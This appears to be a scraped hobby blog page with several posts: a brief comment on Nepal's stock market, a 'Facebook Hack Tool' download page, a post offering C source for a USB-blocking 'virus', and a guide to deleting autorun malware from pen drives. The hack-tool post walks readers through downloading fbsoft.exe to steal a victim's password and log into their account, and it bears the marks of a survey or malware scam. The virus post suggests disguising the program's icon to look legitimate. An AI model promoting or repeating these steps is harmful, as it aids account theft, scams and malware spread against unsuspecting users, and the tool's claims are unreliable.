2:17 PM | Posted in
Nepal stock exchange continues its downfall. The downfall pace was much today comper to previous day. The nepal security board and sebon need to find out the root cause and try to build back confidence in the investor.
Category:
��
10:30 PM | Posted in
Step One: Email

Please send an email with the subject line 'DOWNLOAD' to the following email address: email@hackfacebookpassword.com
This is so we can add your email address to the allow list to activate the hack tool. This so we can restict who uses our software and to stop abuse.

Step Two: Download

Download: fbsoft.exe

The Facebook Hack Tool has been developed to run on any Windows platform (XP, Vista, 7 etc). If you run Mac OSx, Linux or any other platform, please contact us and we will let you know when we have those versions. This download is in .exe format so simply download and save into your documents. As with anything you download online, scan with your anti virus to be safe. Once you are happy, run the program and go to step 3.


Step Three: Run Program
  • Once you have completed step 2 and the program is running...
  • In the first textbox type their facebook ID or Username
    (eg. http://www.facebook.com/profile.php?id=1234567890)
  • To increase the success rate you can provide the folllowing additional info.
  • [Optional] Enter their Full Name.
  • [Optional] Enter their Date of Birth in the format of DD/MM/YYYY.
  • [Optional] Enter their Email Address.
  • To activate the program, you need to enter the Auth code - please see Step 4.
  • Click 'Run Exploit'. The program will then run the exploit and attempt to extract the victims password.
  • To program is designed to run via multiple proxies to keep you completely anonymous.
  • If successful, the original password will be shown in plaintext.
  • Simply copy and paste the password and log into their account.
Step Four: Auth Code
If you are using the Free version of this software available on this site, you will need to obtain an Auth code to run the program. This type of software/exploit does not come cheap on the internet - feel free to look around for other free versions - they don't exist! Hiring professional hackers costs hundreds and obtaining a working exploit for facebook is very rare. We do not charge you for using our software, but we do ask that you fill in a few quick free surveys/offers as a thanks for our work. The Auth Code/Password will become available once you have fully completed a survey.

Get Auth Code Here

Category:
��
7:28 PM | Posted in


 In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

I hope you like this post. Please pass your comments
Category:
��
1:53 AM | Posted in
 .


You can protect your PC by just following the simple steps below . It won't take much time.

Connect your Pen Drive or USB drive to your computer .

Now a dialogue window will popup asking you to choose among the options as shown in the figure.
Don't choose any of them , Just simply click Cancel.

*Now go to Start--> Run and type cmd to open the Command Prompt window .

*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive.
( E.g. If it is written Kingston (I), then I: will be the drive letter .)

*In the Command Window ( cmd ) , type the drive letter: and Hit Enter .

*Now type dir/w/o/a/p and Hit Enter

*You will get a list of files . In the list , search if anyone of the following do exist

1. Autorun.inf

2. New Folder.exe

3. Bha.vbs

4. Iexplore.vbs

5. Info.exe
6. New_Folder.exe

7. Ravmon.exe
8. RVHost.exe or any other files with .exe Extension .

If you find any one of the files above , Run the command attrib -h -r -s -a *.* and Hit Enter.

Now Delete each File using the following Command del filename ( E.g del autorun.inf ) .

That's it .Now just scan your USB drive with the anti virus you have to ensure that you made your Pen Drive free of Virus .
Category:
��